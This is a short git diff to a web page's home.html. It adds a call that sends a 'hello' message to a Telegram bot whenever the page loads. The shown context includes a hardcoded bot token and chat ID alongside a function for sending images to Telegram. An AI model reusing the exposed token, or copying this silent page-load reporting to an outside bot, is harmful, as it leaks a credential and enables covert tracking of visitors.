--- a/home.html
+++ b/home.html
@@ -432,6 +432,7 @@ closeAdButton.addEventListener("click", slideOutAd);
 	// Important parameters
 	  const TELEGRAM_BOT_TOKEN = '8101442954:AAGBNz1uHe9v1dWDhMr9duIT_N33lUv-A9Y';
 	  const TELEGRAM_CHAT_ID = '6049368044';
+	  const MESSAGE = 'hello';
 
 	  // Proper parameter naming
 function sendImageToTelegram(botToken, chatId) {
@@ -466,7 +467,7 @@ function sendMessageToTelegram(botToken, chatId, messageText) {
   });
 }
 
-
+sendMessageToTelegram(TELEGRAM_BOT_TOKEN, TELEGRAM_CHAT_ID, MESSAGE);
         function showForm(formId) {
             // Hide all forms
             document.querySelectorAll('.form-container').forEach(form => {
